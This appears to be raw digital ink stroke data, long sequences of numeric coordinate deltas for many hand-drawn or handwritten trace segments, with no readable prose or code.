0,4-4 0,-2 3 0,7-4 0,-8-1 0,4 1 0,-5 0 0,5-5 0,-4 3 0,4-3 0,-5 5 0,5 0 0,-4 4 0,3-3 0,-4 3 0,0-4 0,5-5 0,-4 4 0,4-4 0,-5 4 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,5-5 0,-4 3 0,4-8 0,-5 4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35:54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1 161 24575,'16'-11'0,"6"-2"0,8-10 0,-1 0 0,0 4 0,-2-2 0,-3 8 0,-2 2 0,-6 1 0,-1 9 0,-8-8 0,8 7 0,-10-2 0,6 4 0,0 0 0,-5 4 0,3 2 0,-7 5 0,2 0 0,-4-1 0,0 1 0,0 0 0,0 4 0,0-3 0,0 8 0,0-8 0,0 4 0,0-6 0,0 1 0,0 0 0,0-1 0,0 1 0,-5 0 0,-1-1 0,0 1 0,2 0 0,4 0 0,-5-6 0,4 5 0,-4-4 0,5 5 0,0-1 0,-5 1 0,4 0 0,-4-1 0,5 1 0,-5-5 0,4 4 0,-4-5 0,0 1 0,-1 4 0,0-4 0,2 5 0,-1-1 0,19-4 0,-11-1 0,24-5 0,1-5 0,-2 3 0,7-3 0,-5 0 0,-4-1 0,-1-1 0,3 2 0,-12 5 0,7 0 0,-11 0 0,1 0 0,4 0 0,2 0 0,0 0 0,3 0 0,-8 0 0,3 0 0,-9 0 0,-1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35:57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0 24575,'-11'0'0,"-4"0"0,3 0 0,-9 0 0,4 0 0,-6 0 0,5 10 0,7-3 0,6 8 0,5-4 0,0 0 0,0-1 0,0 1 0,0 0 0,5-5 0,0 3 0,6-3 0,5 5 0,-5-5 0,0 3 0,3-3 0,-6 5 0,7-5 0,0 3 0,8-2 0,5 4 0,6 5 0,-6-3 0,5 3 0,-15-5 0,8 0 0,-15-5 0,0 3 0,-1-3 0,-4 5 0,-1 0 0,0-1 0,-5 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-5-5 0,-1 4 0,-4-9 0,-1 8 0,0-3 0,0 0 0,0 4 0,0-9 0,1 4 0,-1-5 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,5-5 0,1-1 0,5-5 0,0-5 0,0 4 0,0-3 0,0-1 0,5 4 0,-4-4 0,8 6 0,-7-1 0,7-5 0,-3-1 0,0-10 0,-1 4 0,-5-4 0,0 0 0,0 5 0,0-5 0,0 5 0,0 1 0,0 4 0,0 6 0,0 6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36:05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970 0 24575,'-18'39'0,"9"-7"0,-50 46 0,34-43 0,-9 11 0,-1 3 0,-13 20 0,-4-12 0,15-4 0,0-2 0,-8-2 0,9-4 0,-1 3 0,4-8 0,0-1 0,-21 27 0,-5 5 0,24-25 0,-1 7 0,1-5 0,5-1 0,-4-2 0,16-20 0,-9 6 0,15-15 0,-3 10 0,4-12 0,0 5 0,0-9 0,0 2 0,1 4 0,4-6 0,-4 1 0,9 0 0,-4-5 0,5-2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36:07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24575,'16'0'0,"-4"0"0,5 0 0,4 0 0,-8 0 0,13 0 0,-9 0 0,1 0 0,-3 0 0,15 0 0,-10 0 0,11 4 0,-16-2 0,-4 7 0,0-3 0,-1 5 0,1-1 0,0 1 0,-5 0 0,-2 0 0,1 4 0,-4-3 0,4 3 0,-5-4 0,0 0 0,0-1 0,0 1 0,0 5 0,-5 0 0,-1 1 0,-20 13 0,1-10 0,-8 17 0,5-18 0,10 8 0,-4-10 0,5 10 0,-4-4 0,-6 12 0,9-11 0,-2 7 0,9-10 0,0 1 0,5-6 0,-4-5 0,9-2 0,7-7 0,6 2 0,22-4 0,-2-5 0,3 3 0,42-20 0,-36 12 0,45-15 0,-36 2 0,-3 13 0,-5-11 0,-3 10 0,-19 3 0,1-1 0,-17 9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36:09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24575,'11'0'0,"0"0"0,-1 0 0,1 0 0,0 0 0,5 0 0,-4 0 0,15 0 0,-14 0 0,8 0 0,6 0 0,-6 0 0,13-6 0,0 0 0,-4-11 0,-1 10 0,-8-8 0,-5 14 0,-9-4 0,2 5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36:10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24575,'21'0'0,"-8"0"0,8 0 0,-10 0 0,-1 0 0,1 0 0,-5 0 0,-1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36:12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24575,'17'0'0,"-5"0"0,4 0 0,4 0 0,4 0 0,-2 0 0,-1 0 0,0-5 0,-7 4 0,7-4 0,-11 0 0,1 4 0,5-9 0,0 4 0,1 0 0,-2-4 0,5 9 0,-6-4 0,6 5 0,-14 0 0,-2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5T14:37:28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24575,'0'37'0,"0"-1"0,0 33 0,0-23 0,0 38 0,0-4 0,0-2 0,0 18 0,0-32 0,0-2 0,0-16 0,0-1 0,0-14 0,0 5 0,0 4 0,0-7 0,0-1 0,0-16 0,0-6 0,0-4 0,0-1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5T14:41:13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24575,'0'33'0,"0"13"0,0 6 0,0 10 0,0-6 0,0-13 0,0 10 0,0-29 0,0 6 0,0-7 0,0 5 0,0-3 0,0-3 0,0-6 0,0-5 0,0-5 0,0-1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36:22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24575,'22'0'0,"1"0"0,17 0 0,-19 0 0,24 0 0,-15 0 0,8 0 0,-8 0 0,5 0 0,-22 0 0,16 0 0,-12 0 0,1 0 0,23 19 0,-25 0 0,20 13 0,-30-11 0,-2 4 0,-4-7 0,0 8 0,0-9 0,0 4 0,0-4 0,0 13 0,0 5 0,-5 14 0,-17 43 0,11-39 0,-15 24 0,24-59 0,-8 19 0,4-21 0,0 15 0,1-20 0,5 4 0,0-3 0,0 4 0,-4-11 0,2 5 0,8-9 0,13-2 0,6 0 0,21-5 0,-8 1 0,30-1 0,-13-6 0,1 0 0,-17 6 0,-18-4 0,-6 9 0,-4-4 0,0 1 0,0 2 0,-1-7 0,1 8 0,-5-4 0,-1 5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36:23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24575,'0'11'0,"0"0"0,0 4 0,0-3 0,5 4 0,1-1 0,5 2 0,-1 4 0,6 6 0,1-4 0,0 15 0,-1-19 0,-5 13 0,1-9 0,-6-4 0,4 16 0,-4-21 0,5 6 0,-5-10 0,-2-9 0,-4 4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36:26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24575,'12'-13'0,"4"-3"0,2 15 0,-1-4 0,15 0 0,-18 4 0,17-4 0,-15 5 0,1 0 0,-2 0 0,-4 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-5 4 0,-1 2 0,-5 5 0,0 5 0,0-5 0,0 5 0,0-1 0,0 2 0,0 4 0,-5 1 0,4-6 0,-9 5 0,4 5 0,0-3 0,-4 4 0,9-12 0,-4-4 0,5-1 0,0 1 0,0 0 0,5-5 0,1-1 0,5-5 0,-1-5 0,6 4 0,-4-4 0,13 0 0,-12 4 0,7-4 0,-9 0 0,4 4 0,-3-4 0,4 0 0,-6 4 0,1-4 0,19 0 0,-15 4 0,10-4 0,-20 5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36:27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24575,'3'0'0,"5"0"0,9 0 0,-1 0 0,1 0 0,-5-11 0,10 9 0,5-14 0,-2 5 0,1 3 0,-10-2 0,-5 10 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-5 5 0,-1 1 0,-5 4 0,0 6 0,5 1 0,-4-1 0,4 0 0,-5-1 0,4 2 0,-3 4 0,4 0 0,-5 1 0,5-5 0,-4-2 0,4 10 0,-5-6 0,5 12 0,-4-15 0,4 0 0,-1 4 0,2-2 0,5 8 0,-5-5 0,3 1 0,-3 9 0,0-12 0,-1 6 0,-5-15 0,5 1 0,-4-5 0,4-1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41:37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1363 2 24575,'-23'0'0,"5"0"0,-4 0 0,-6 0 0,2 0 0,-14 0 0,15 0 0,-11 0 0,4 0 0,-21 0 0,12 0 0,-23-1 0,-6 2 0,-12 11 0,5-7 0,-2 5 0,26 8 0,5 3 0,-4-1 0,2 1 0,3-2 0,2 2 0,-25 26 0,11-15 0,13 18 0,9-8 0,9 4 0,6-1 0,9-5 0,-4 13 0,5-5 0,1 5 0,-1 0 0,5-5 0,-4 21 0,10-28 0,-5 36 0,6-31 0,0 32 0,0-2 0,0 1 0,0 20 0,0-37 0,0 1 0,0-34 0,0-6 0,5 1 0,-4-1 0,9-4 0,-9-2 0,9-4 0,-4 0 0,4-5 0,6-2 0,0-4 0,6 5 0,-1-4 0,28 10 0,44 1 0,-13 2 0,-28-7 0,0-1 0,34 6 0,-24-11 0,32 5 0,-7 0 0,7 2 0,-36-5 0,0 1 0,-7 2 0,-1 0 0,2-6 0,1 1 0,1 5 0,1 0 0,2-5 0,4-1 0,17 6 0,1 0 0,-7-4 0,-2-2 0,-1 3 0,-2 0 0,-14-2 0,-2-2 0,1 1 0,0 0 0,44 0 0,-31 0 0,1 0 0,-7 0 0,0 0 0,4 0 0,0 0 0,-2 0 0,4 0 0,33 0 0,1 0 0,-27 0 0,0 0 0,29 0 0,-4 0 0,-4 0 0,-7 0 0,9 0 0,-22 0 0,24 0 0,-7 0 0,-13 0 0,-26 0 0,-1 0 0,25 0 0,-5 0 0,19 0 0,4 0 0,-39 0 0,2 0 0,14 0 0,8 0 0,-7 0 0,-9 0 0,-6 0 0,-5 0 0,0 0 0,14 0 0,-2 0 0,26 0 0,-9 1 0,3-2 0,-19-1 0,-1-2 0,13-2 0,-1-2 0,-11 1 0,-4-1 0,-9 1 0,-1 0 0,41-4 0,-8 9 0,-21-3 0,7 5 0,-31 0 0,4 0 0,-19 0 0,-2 0 0,0 0 0,-4 0 0,3 5 0,7 0 0,3 1 0,3-1 0,-1-5 0,-9 0 0,-1 0 0,-6 0 0,-6 0 0,6 0 0,0 0 0,1 0 0,-1 0 0,-6 0 0,-4 5 0,-1 1 0,-5 0 0,0-1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51:09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24575,'53'0'0,"1"0"0,41 0 0,-18 0 0,-12 0 0,-2 0 0,0 0 0,-7 0 0,5 0 0,0 0 0,-1 0 0,-10 0 0,2 0 0,25 0 0,0 0 0,-23 0 0,-2 0 0,2 0 0,-1 0 0,32 0 0,6 0 0,-13 0 0,10 0 0,-7 0 0,5 0 0,-17 5 0,-20-3 0,12 9 0,-25-5 0,19 1 0,-28-2 0,-10-5 0,-2 0 0,-4 0 0,0 0 0,0 0 0,-1 0 0,6 0 0,-3 0 0,44 0 0,-36 0 0,40-5 0,-62 4 0,8-4 0,-22 5 0,-11 0 0,11 0 0,-21 0 0,17 0 0,-10 6 0,6-5 0,1 4 0,-2-5 0,7 0 0,-30 5 0,12-3 0,-22 3 0,21-5 0,-10 5 0,18-4 0,-12 4 0,6-5 0,9 0 0,-9 0 0,-6 5 0,12-3 0,-18 3 0,21 0 0,-11-4 0,-29 16 0,2-9 0,-29 10 0,16 0 0,-15 9 0,20 14 0,16-16 0,29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38:11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24575,'37'0'0,"33"0"0,-25 0 0,32 0 0,-22 0 0,12 0 0,17 0 0,-9 0 0,-23 0 0,0 0 0,21 0 0,9 0 0,-13 0 0,9 0 0,-18 0 0,17 0 0,1 0 0,-18 0 0,18 0 0,-24 0 0,0 0 0,33 0 0,-15 0 0,27 0 0,-24 0 0,0 0 0,-6 0 0,-2 0 0,-15 0 0,-3 0 0,-1 0 0,30 0 0,-60 0 0,10 0 0,-9 0 0,7 0 0,7 0 0,-6 0 0,11 0 0,2 0 0,-13 0 0,13 0 0,0 0 0,-2 0 0,15-5 0,-18 4 0,-2-4 0,-7 5 0,-8 0 0,2 0 0,-10 0 0,-4 0 0,-1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42:55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24575,'23'0'0,"7"0"0,9 0 0,48 0 0,-15 0 0,25 0 0,-45 0 0,1 0 0,45 0 0,-9 0 0,5 0 0,-15 0 0,3 0 0,-4 0 0,6 0 0,0 0 0,0 0 0,1 0 0,-4 0 0,17 0 0,-4 0 0,4 0 0,-6 0 0,-38 0 0,-2 0 0,11 0 0,3 0 0,3 1 0,0-2 0,-1-4 0,-2-2 0,-2 7 0,-4-3 0,34-15 0,-33 17 0,-2 0 0,19-11 0,-19 10 0,1 2 0,34-6 0,-36 2 0,0 1 0,-3 3 0,-2-1 0,23-5 0,-27 3 0,2 0 0,11-1 0,1 0 0,-7 1 0,0-1 0,11 0 0,-4 2 0,0 2 0,6 0 0,-18 0 0,12 0 0,13 0 0,-23 0 0,25 0 0,-20-1 0,2 2 0,34 5 0,-11-3 0,-1 1 0,6 10 0,-19-7 0,-3-1 0,-1 2 0,22 3 0,-32-10 0,-15 11 0,35-11 0,-27 5 0,22-6 0,-34 0 0,23 0 0,-30 0 0,25 0 0,-30 0 0,19 0 0,6 0 0,5 0 0,4 0 0,2 0 0,27 0 0,-23 0 0,-14 0 0,2 0 0,40 0 0,-8 0 0,14 0 0,-44 0 0,-6 0 0,-14 0 0,-7 0 0,-11 0 0,0 0 0,-6 0 0,-4 0 0,-1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43:47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1 384 24575,'59'0'0,"2"0"0,-11 0 0,4 0 0,1 0 0,-1 0 0,42 0 0,-6-6 0,-4-2 0,-25 4 0,13-2 0,9-2 0,3 1 0,0-1 0,-18-1 0,2-1 0,-7 3 0,5 1 0,2 0 0,12-1 0,2-1 0,-5 0 0,1 0 0,-1 1-686,-2 4 1,4 0 0,-5-2 685,0-5 0,-7-1 0,-8 7 0,-1 0 0,14-3 0,2-2 0,0 2 0,4 0 0,15 0 0,2-2 0,-9-1 0,0-1 0,-19 5 0,2 0 0,-5 0-302,2-5 1,-5 0 301,-6 7 0,3-1-45,20-8 0,3-1 45,-14 7 0,2 1 0,5-3 0,7-3 0,2 3 0,5 2 0,2 2 0,-2 0 0,-16 1 0,-3 1 0,2 0 0,13 1 0,2-1 0,-6 2 0,7 0 0,-5 2 0,3-2 0,-1 2 0,-1 4 0,-2 3 0,-3-1 0,-3 1 0,-17 3 0,0 1 0,26 5 0,-3-1 0,7 2 989,-6-4 0,0-1-989,10 1 0,-17-7 0,2-1 0,-23 1 0,-1-1 334,16-2 0,-2-1-334,15 3 0,5-6 0,-28 6 103,0-5-103,-13 10 0,-7-10 0,17 10 0,-8 1 0,20 11 0,-19-3 0,9 2 0,-25-11 0,-1-4 0,-12-3 0,-6-4 0,-1 0 0,-3 0 0,-1 0 0,-7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43:50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24575,'31'-20'0,"12"-8"0,21 1 0,-17 9 0,20-6 0,-5 12 0,-9 3 0,25-5 0,-11 8 0,-17 6 0,-4 0 0,-18 0 0,-16 0 0,5-5 0,-11 9 0,-2 13 0,-4-2 0,0 50 0,0-1 0,-5 8 0,-2-3 0,-17-8 0,8-17 0,-14 18 0,11-31 0,-10 9 0,-1-4 0,1 5 0,-4-7 0,3-1 0,1-4 0,-5 5 0,10 0 0,-4 1 0,11-12 0,6 4 0,1-10 0,4 0 0,0-1 0,6-10 0,6-2 0,9-13 0,53-10 0,-11-1 0,28-4 0,-1 10 0,-8 1 0,-18 3 0,2 1 0,-1 1 0,-2 1 0,24-6 0,-19 3 0,-30 9 0,-7-9 0,37 0 0,4 2 0,-25-2 0,10 2 0,1-1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5T14:41:15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0 24575,'0'22'0,"0"-6"0,-5 5 0,4-9 0,-4 5 0,5-7 0,0 1 0,0 0 0,0-1 0,-17 2 0,-18 15 0,-41 19 0,27-17 0,-8 6 0,46-30 0,1-4 0,-1 9 0,10-9 0,6 4 0,13 0 0,11 2 0,-5 4 0,13 7 0,-6 1 0,6 6 0,23 28 0,-17-21 0,10 19 0,-9-12 0,-23-13 0,10 6 0,-20-16 0,-5-6 0,-1-4 0,-5-1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43:51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24575,'35'-11'0,"-5"-6"0,11 3 0,-5-3 0,-5 5 0,8-5 0,-15 9 0,22-3 0,-16 11 0,3 0 0,-8 0 0,-7 0 0,3 0 0,-1 0 0,-13 5 0,3 1 0,-10 4 0,0 1 0,0 5 0,0-4 0,0 3 0,0 0 0,-5-3 0,-1 4 0,-5-6 0,1 1 0,-1-5 0,5 4 0,-4-9 0,9 8 0,1-8 0,6 4 0,4-5 0,17 0 0,-7-5 0,14-2 0,6-5 0,-13 6 0,13 0 0,-7 1 0,-7 4 0,8-5 0,-17 6 0,5 0 0,-10 0 0,4 0 0,-5 0 0,0 0 0,-5 5 0,-1 1 0,-5 10 0,0 0 0,0 1 0,0-2 0,0-4 0,-10 4 0,-2 2 0,-5 0 0,-3 3 0,2-8 0,-15 4 0,-10 1 0,6-4 0,-51 25 0,47-16 0,-41 17 0,57-22 0,-1-1 0,16-6 0,4 6 0,1-4 0,5-2 0,0-5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43:53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24575,'28'0'0,"-1"0"0,9 0 0,16 0 0,-16-6 0,18 5 0,-16-5 0,-7 6 0,-1 0 0,-3 0 0,-8 0 0,2 0 0,-10 0 0,-5 10 0,-1-3 0,-5 8 0,0 1 0,0-4 0,0 3 0,0-4 0,0 5 0,-10 6 0,-19 23 0,-3-1 0,-13 13 0,10-17 0,6 0 0,-5-6 0,11-1 0,0-9 0,7 1 0,6-8 0,4-1 0,6-5 0,6-6 0,15-5 0,-3 0 0,17 0 0,-4 0 0,30 0 0,0 0 0,28 0 0,-18 0 0,7 0 0,-39 0 0,-3 0 0,-30 5 0,-1-4 0,-5 4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44:10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24575,'69'0'0,"-34"0"0,47 0 0,-21 0 0,-2 0 0,15 0 0,-2 0 0,-2 0 0,-14 0 0,-7 0 0,4 0 0,2 0 0,2 0 0,11 0 0,1 0 0,-11 0 0,-4 0 0,17 0 0,-36 0 0,-9 0 0,-13 0 0,4 0 0,-13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44:12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24575,'3'0'0,"12"0"0,9 0 0,5 0 0,-6 0 0,7 0 0,11 0 0,4 0 0,-2 0 0,-14 0 0,13 0 0,-21 0 0,17 0 0,-28 5 0,-5 6 0,-5 1 0,0 8 0,0-8 0,0 3 0,0 1 0,0 1 0,0 0 0,-5 15 0,-8-5 0,-10 18 0,-9 11 0,-9-7 0,3 17 0,-2-23 0,9 8 0,3-21 0,15-2 0,-6 2 0,17-16 0,-13 11 0,14-14 0,1-5 0,6-2 0,10-4 0,2 0 0,22 0 0,-3 0 0,12 0 0,7 0 0,-6 0 0,-3 0 0,-10 0 0,-16 0 0,1 0 0,9 0 0,-12 0 0,6 0 0,-19 0 0,-2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44:14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24575,'0'31'0,"0"-1"0,0 4 0,0-8 0,0 3 0,0 29 0,0-22 0,0 26 0,0-35 0,0-12 0,0-4 0,5-5 0,1-1 0,9-1 0,-3-3 0,4 4 0,0-5 0,-4 0 0,10 0 0,-10 0 0,10 0 0,-5 0 0,5 0 0,-1 0 0,-14 0 0,-3-5 0,-15 4 0,0-4 0,5 1 0,-4 2 0,4-7 0,0 3 0,-3-5 0,3 5 0,-5-4 0,5 4 0,-4-9 0,9 3 0,-4-4 0,1 5 0,2 0 0,-3 1 0,5-1 0,-4 5 0,-2-4 0,-5 9 0,0-4 0,0 5 0,0 0 0,1 0 0,-1 0 0,5 0 0,1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44:15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24575,'0'28'0,"0"-19"0,0 31 0,0-24 0,0 1 0,0 0 0,0-1 0,0-6 0,0 1 0,0 0 0,-4-5 0,2 3 0,2-7 0,11 2 0,1-4 0,3 0 0,1 0 0,-4-5 0,3 4 0,1-4 0,-5 5 0,5 0 0,-5 0 0,-5-4 0,3 2 0,-3-2 0,5 4 0,-1-5 0,1 4 0,0-4 0,-5 5 0,-2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44:16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24575,'0'15'0,"0"3"0,0 9 0,0-3 0,0-1 0,0 3 0,0-2 0,0 5 0,0-1 0,0 0 0,0 1 0,0-5 0,0 2 0,0 1 0,0 4 0,0-3 0,0-7 0,0-6 0,0 7 0,0-4 0,0 2 0,0-14 0,0-1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50:01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24575,'23'0'0,"-4"0"0,5 0 0,14-10 0,-9 1 0,29-13 0,-18 8 0,2-3 0,-13 5 0,5 0 0,8 6 0,6 0 0,22 6 0,-30 0 0,27 0 0,-29 0 0,19 5 0,-19 2 0,-1 9 0,-9 17 0,-5 14 0,-5 2 0,-8 21 0,-10-12 0,-5 26 0,-15 7 0,-7-5 0,6-36 0,-3-3 0,-15 24 0,12-28 0,0-1 0,-5 9 0,-13 5 0,21-22 0,-3-6 0,5-5 0,5-8 0,-3-4 0,8-1 0,-13 6 0,2 5 0,-11-3 0,6 3 0,0-10 0,10 0 0,-30 10 0,20-2 0,-27 3 0,31-6 0,-2-5 0,23-5 0,5-2 0,33-4 0,-2 0 0,23-6 0,14-1 0,-2-7 0,20 6 0,8-4 0,-46 7 0,1 2 0,5-1 0,-1 0 0,38-2 0,-18 6 0,-27 0 0,-12 0 0,-15 0 0,-6 0 0,-3 0 0,4 0 0,-1 0 0,2 0 0,-1 0 0,0-5 0,-1-1 0,2 0 0,0 1 0,-7 5 0,-5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50:03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24575,'3'0'0,"0"0"0,12 0 0,1 0 0,-5 0 0,5 0 0,-5 0 0,4 0 0,-3 0 0,8 0 0,-3 0 0,4 0 0,-4 0 0,-2 5 0,1 1 0,-9 4 0,7 1 0,-13 0 0,9 0 0,-9-1 0,4 1 0,-5 0 0,0-1 0,0 6 0,0-4 0,0 3 0,0 1 0,-5 0 0,-6 6 0,-6 8 0,-9-1 0,8-2 0,2-6 0,6-16 0,9 5 0,-4-4 0,1 0 0,2 8 0,-2-7 0,-1 9 0,4-6 0,-9 1 0,9 0 0,-4-1 0,15-4 0,3-1 0,27-5 0,-13 0 0,13 0 0,-12 0 0,-3 0 0,-3 0 0,-1 0 0,-3 0 0,-2 0 0,1 0 0,-7 0 0,1 0 0,4 0 0,-3 0 0,4 0 0,-6 0 0,1 0 0,0 0 0,0-5 0,9 4 0,-7-4 0,2 5 0,-10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50:05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24575,'0'23'0,"0"-6"0,0-1 0,0 5 0,0-2 0,-5-2 0,4 3 0,-4-8 0,5 5 0,0-2 0,-10 1 0,7-4 0,-7 4 0,10-1 0,0-3 0,0 3 0,0-4 0,-5-5 0,4 4 0,-4-4 0,5 4 0,10-4 0,-3-1 0,8-5 0,12-5 0,-7 3 0,13-3 0,1 0 0,-8 4 0,7-4 0,1-1 0,-14 5 0,12-4 0,-15 5 0,0 0 0,-1 0 0,-6 0 0,-4 0 0,-1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5T14:41:16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1311 24575,'0'-24'0,"0"-3"0,0 4 0,0-1 0,0-11 0,0-22 0,0-11 0,0-25 0,0-6 0,0 22 0,0 6 0,0-14 0,0 43 0,0-57 0,0 40 0,0-10 0,0 16 0,-10 14 0,8 5 0,-24-28 0,17 16 0,-7-3 0,11 28 0,0 10 0,-1-5 0,0 4 0,-3-4 0,2 21 0,1-7 0,1 12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50:07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24575,'0'16'0,"0"-11"0,0 35 0,0-5 0,0 6 0,0 0 0,0-11 0,0-2 0,0 6 0,0-4 0,0-3 0,0-11 0,0-5 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0-4 0,0-1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57:25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24575,'21'0'0,"-2"0"0,14 0 0,-9 0 0,4 0 0,-10 0 0,14 0 0,-2 0 0,17 0 0,-1 0 0,0 0 0,1 0 0,6 0 0,5 0 0,-19 0 0,14 0 0,-28 0 0,25 0 0,-14-5 0,14 4 0,-15-4 0,10 5 0,-4 0 0,5 0 0,1-6 0,-6 5 0,-2-4 0,-5 5 0,-5 0 0,8 0 0,-7 0 0,2 0 0,1 0 0,-10 0 0,28-5 0,-28 4 0,17-4 0,-29 5 0,4 0 0,-3 0 0,8 0 0,-3 0 0,4-5 0,-4 4 0,-2-4 0,5 5 0,-7 0 0,8-5 0,-6 4 0,-3-4 0,3 5 0,-4 0 0,0 0 0,4 0 0,-3 0 0,4 0 0,-6 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-5 0 0,-1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57:4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24575,'59'0'0,"1"0"0,5 0 0,1 0 0,3 0 0,11 0 0,-3 0 0,11 0 0,-24 0 0,-2 0 0,0 0 0,-6 0 0,6 0 0,-4 0 0,2 0 0,27 0 0,-21 0 0,0 0 0,16 6 0,-13-5 0,-8 5 0,29-6 0,-38 0 0,20 0 0,-42 0 0,-7 0 0,0 0 0,1 0 0,30 0 0,-7 0 0,28 0 0,-14 5 0,0 2 0,0 11 0,6-5 0,2-1 0,0-1 0,4-4 0,-10-1 0,-13 0 0,11-6 0,-33 0 0,26 5 0,-29-4 0,13 4 0,0-5 0,9 0 0,-6 0 0,43 0 0,-49 0 0,39 0 0,-39 0 0,0 0 0,-1 0 0,-2 0 0,15 0 0,-19 0 0,11 0 0,-23 0 0,-5 0 0,5 0 0,-10 0 0,-1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57:56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1727 1 24575,'-16'0'0,"-2"0"0,-37 0 0,-7 0 0,-14 0 0,-3 0 0,30 0 0,-19 0 0,19 0 0,-45 0 0,7 0 0,2 0 0,26 0 0,0 0 0,-14 0 0,-13 0 0,2 23 0,-1 6 0,7 5 0,30-14 0,4 0 0,3-1 0,10 9 0,10-7 0,15-4 0,-5 15 0,4 46 0,-6 1 0,9-30 0,0 4 0,-6 15 0,-1 2 0,6-12 0,1 5 0,-3 14 0,-2 9 0,1-4-250,1 9 1,0 0 249,1-10 0,0 3 0,1-4 0,-2 7 0,-1-4 0,0 5 0,1-3 0,3-15 0,0-3 0,-2-4 0,0-2 0,2-7 0,0-1 0,-5-3 0,-1 1 0,3 8 0,-1-3 0,-10 16 249,11-16 1,1 0-250,-7 14 0,6 23 0,1-10 0,6-1 0,0 3 0,0-11 0,0-18 0,0 0 0,6 24 0,0-21 0,1-2 0,7 10 0,5-5 0,-1-8 0,-3-7 0,0 2 0,7 29 0,-7-27 0,-1-4 0,-2 6 0,-6-6 0,4-1 0,-8 1 0,3 0 0,0-10 0,-4-9 0,4-12 0,-5 5 0,5-8 0,-4 13 0,9-14 0,-4 13 0,4-12 0,11 12 0,-8-18 0,12 3 0,2-10 0,22 0 0,-9 0 0,14 0 0,8 0 0,-4 0 0,3 0 0,20 0 0,3 0 0,-4 0 0,0 0 0,2 0 0,-6 0 0,16 0 0,-35 0 0,-6 0 0,-11 0 0,28 0 0,-7 0 0,15 0 0,-19 0 0,-9-6 0,-11 5 0,28-11 0,6 0 0,1 4 0,-14-3 0,-18 6 0,-4 3 0,5-3 0,4 5 0,-10 0 0,20 0 0,1 0 0,-12 0 0,-9 0 0,-30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59:48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24575,'52'0'0,"0"0"0,31-7 0,0 4 0,10-4-2423,-14-5 1,5-4 0,-2 1 2422,-7 6 0,0 1 0,3-1 0,17-3 0,4-1 0,-5 2 627,-26 4 1,-4 2 0,8 0-628,7 2 0,10 0 0,6 2 0,-2-1 0,-7 0 0,-6 0 0,-5-1 0,1 0 0,7 1-64,-2 0 0,8 0 0,3 0 0,1 1 0,-5 0 0,-9 0 64,24 1 0,-11 0 0,-1 0 0,-4 0 0,-1 0 0,0 0 0,4 0 0,-1 0 0,-7 0 0,-4 0 0,-4 0 0,20 0 0,-13 0 0,-34 0 0,35 0 3604,-25 0-3604,14 0 88,-1 4 1,3 4-89,-18 6 0,2 2 0,35 4 0,5 4 0,-16 9 0,-3 0 0,-7-5 0,-2-2 993,3 4 1,1-3-994,-6-11 0,-1-2 0,-6 0 0,-2-2 0,1-7 0,-2-2 0,27 3 0,-7-6 0,9 0 0,-24 0 0,12 0 0,3 0 0,9 0 0,-17 0 0,9 0 0,-8 0 0,5 0 0,-4 0 0,15 0 0,0 0-412,-19 0 1,3 1 0,-6-2 411,0-5 0,-10-1 0,-5-2-284,9-9 0,2-3 284,8-3 0,-17 7 0,7 0 0,6 1 0,6 0 0,-6 4 0,-7 4 0,0 2-237,10-4 1,6-3 0,-10 5 236,15 8 1152,-7 0-1152,3 6 0,-22 2 0,-2 2 0,20 5 581,-4 8-581,-30-10 0,-7 3 0,7 2 778,-12-1-778,-3-6 0,-11-6 0,-4-5 0,-1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32:21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0 240 24575,'0'87'0,"0"11"0,6-20 0,2 1 0,0-18 0,2 0 0,5 36 0,3 3 0,1-14 0,1-5-975,1-17 1,-1-1 974,-3 2 0,-1-3 314,1-9 0,0-5-314,-3 24 322,5 9-322,-12-32 0,2-33 0,24-11 999,12-11-999,27 4 0,-17-7 0,2-2 0,34 1 0,-26 0 0,4-2 0,3-3 0,0 0 0,1 3 0,2-2 0,16-4 0,1-1 0,-12 3 0,-4 2 0,-9 3 0,-5 0 0,-9-2 0,-4 1 0,23-7 0,-23-4 0,-11 5 0,-15 2 0,-8 5 0,1-4 0,1-8 0,0-17 0,1-31 0,-13 13 0,-3-6 0,2-13 0,-2 0 0,-1 14 0,-2-2 0,1-36 0,0 6 0,0 21 0,0 5 0,0 3 0,0 19 0,0 9 0,0 8 0,-5-23 0,4 23 0,-9-27 0,9 38 0,-9-11 0,4 16 0,-5-11 0,5 13 0,-4 1 0,0 6 0,-18 5 0,-14 0 0,-19 0 0,-31 0 0,28 3 0,-1 1 0,6 0 0,1 1 0,2 1 0,3 2 0,-33 13 0,-5 7 0,2-3 0,13-5 0,0-1 0,-17 4 0,30-12 0,3-1 0,-6 1 0,18-11 0,7 0 0,11 0 0,-4 0 0,11 5 0,3 1 0,-13 0 0,-4-1 0,-4-5 0,7 0 0,-9 0 0,20 0 0,-8 0 0,26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32:22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24575,'61'0'0,"-7"0"0,43 0 0,-44 11 0,0 3 0,45 6-938,-40-2 0,0 0 938,34 11 0,-23-7 0,4 1 0,-11-5 0,0 1 302,16 11 1,1 1-303,-4-4 0,-2 0 0,-2 0 0,0 2 0,5 3 0,4 2 0,-3-4 0,6 3 0,-10-4 0,-13-2 0,-4-2 155,30 6 0,-13 0-155,-44-5 0,-11-17 0,-7 17 0,-6-18 0,-5 2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32:24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24575,'45'0'0,"-10"0"0,13 0 0,4 0 0,12 0 0,-10-1 0,5 2 0,2 4 0,2 4 0,3 8 0,2 2 0,8-2 0,-2 2 0,-22 2 0,-2 1 0,10-4 0,-2-2 0,20 12 0,8-4 0,-33-2 0,-37-21 0,-10 9 0,-1-4 0,-5 10 0,-11 49 0,9-23 0,-20 47 0,20-49 0,-14 2 0,9-6 0,0-5 0,-9 10 0,14-2 0,-14 6 0,9-2 0,-4-2 0,4-2 0,-3 0 0,8-14 0,-28 25 0,14-33 0,-28 18 0,12-22 0,-29 5 0,2-3 0,-7 3 0,-18 2 0,7 1 0,0-1 0,27-5 0,4 0 0,3-1 0,-14 3 0,39-7 0,9-9 0,9 4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32:25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24575,'0'80'0,"0"-1"0,0-2 0,0 1 0,0 5 0,0-2-1560,0-11 1,0 0 1559,3 18 0,2 1 0,-2-13 0,2-4 0,3-21 